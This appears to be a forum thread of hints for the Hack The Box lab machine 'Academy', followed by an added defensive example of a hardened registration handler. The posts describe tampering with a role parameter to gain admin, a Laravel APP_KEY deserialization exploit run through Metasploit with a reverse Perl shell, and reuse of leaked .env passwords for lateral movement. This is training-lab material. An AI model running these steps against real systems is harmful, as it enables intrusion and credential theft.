TUTORIAL Academy Discussion
by Ro0ted - November 07, 2020 at 09:49 PM
#1
If anyone has any hints for the box, feel free to post here :)
#2
Registered a user with the admin role by changing role from 0 to 1 in request - from there logged into /admin.php panel and saw tasks completed. Added dev/staging subdomain to hosts and saw laravel debug info - db creds leaked but haven't been able to do anything with them.
port 33060 open but haven't had any luck with mysql cli. :/

any help?
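
The role change described in post #2 only works when the server copies a client-supplied role field into the new account. The following is an added example, not part of the thread and not the application's own code: it puts a handler that trusts the submitted form beside one that builds the account from an allow-list and logs the tampering attempt. The field names (`username`, `password`, `role`) and both handler functions are assumptions made for illustration.

```python
# Added example: hypothetical registration handlers, not the target application's code.
import logging

log = logging.getLogger("register")

# Fields a self-service signup form may set (assumed names).
ALLOWED_FIELDS = {"username", "password"}
DEFAULT_ROLE = 0  # ordinary user; 1 = admin, following the 0/1 values in the thread


def register_vulnerable(form: dict) -> dict:
    """Copies every submitted field into the new account, including role."""
    user = {"role": DEFAULT_ROLE}
    user.update(form)  # a hidden form field becomes an authorization decision
    return user


def register_hardened(form: dict) -> dict:
    """Builds the account from an allow-list and sets the role server-side."""
    unexpected = sorted(set(form) - ALLOWED_FIELDS)
    if unexpected:
        # Worth alerting on: the stock signup form never needs these fields.
        log.warning("signup for %r carried unexpected fields: %s",
                    form.get("username"), unexpected)
    missing = sorted(ALLOWED_FIELDS - set(form))
    if missing:
        raise ValueError(f"missing fields: {missing}")
    # Password hashing is omitted here to keep the focus on field handling.
    user = {name: form[name] for name in ALLOWED_FIELDS}
    user["role"] = DEFAULT_ROLE  # never taken from the request
    return user


# Constructed sample request body with the role field changed from 0 to 1.
TAMPERED = {"username": "alice", "password": "example-only", "role": 1}

if __name__ == "__main__":
    print(register_vulnerable(TAMPERED)["role"])  # 1
    print(register_hardened(TAMPERED)["role"])    # 0
```

Role changes then belong to a separate, authenticated admin action rather than to the signup request.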
#3
Anything, guys? Please help. Confused a little after getting creds; tried SMTP, but hey, please help.
#4
use metasploit module with app_key
#5
(November 07, 2020 at 11:20 PM)Ro0ted Wrote: use metasploit module with app_key

set APP_KEY dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=

```
msf6 exploit(unix/http/laravel_token_unserialize_exec) > exploit
[*] Exploit completed, but no session was created.
```

Any thoughts?
#6
Hmmmm have u set everything well
#7
(November 07, 2020 at 11:29 PM)guest55 Wrote: Hmmmm have u set everything well

Does this look correct?
```
msf6 exploit(unix/http/laravel_token_unserialize_exec) > show options

Module options (exploit/unix/http/laravel_token_unserialize_exec):

  Name      Current Setting                              Required  Description
  ----      ---------------                              --------  -----------
  APP_KEY    dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0=  no        The base64 encoded APP_KEY string from the .env file
  Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS    10.10.10.215                                  yes      The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT      80                                            yes      The target port (TCP)
  SSL        false                                        no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /                                            yes      Path to target webapp
  VHOST      academy.htb                                  no        HTTP server virtual host


Payload options (cmd/unix/reverse_perl):

  Name  Current Setting  Required  Description
  ----  ---------------  --------  -----------
  LHOST  10.10.xx.xxx    yes      The listen address (an interface may be specified)
  LPORT  4444            yes      The listen port
```
#8
the vhost is wrong, you have to put the vhost you found in admin panel
#9
bingo:
set vhost dev-staging-01.academy.htb

got a foothold. now what lol

looks like a bunch of users. hmmmm.

Hmmm cracked some bcrypt hashes found from linpeas but it appears it's just the homestead db password: "secret"
I can't connect to forge or homestead dbs as www-data. I keep getting "Access denied for user 'XXXXX'@'localhost"

Tried to get stuff from redis but redis-cli isn't installed. Where is everyone else looking? I feel as though it's right in front of my face and I'm just missing it.

Wondering if anyone was able to connect with the info in: /var/www/html/academy/.env???
...
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
...


Trying to connect:
[email protected]:/var/www/html/academy$ mysql -u dev -h 127.0.0.1 -D academy -p
mysql -u dev -h 127.0.0.1 -D academy -p
Enter password: mySup3rP4s5w0rd!!

ERROR 1045 (28000): Access denied for user 'dev'@'localhost' (using password: YES)
#10
password for cry0l1t3 user is in here, just su or you can ssh in
/var/www/html/academy/.env
#11
(November 08, 2020 at 12:32 AM)ragnarokhype Wrote: password for cry0l1t3 user is in here, just su or you can ssh in
/var/www/html/academy/.env

Ahhhh Thank you! I didn't think of using the db password for user login. Now on to the privesc...
#12
just rooted - what a ride
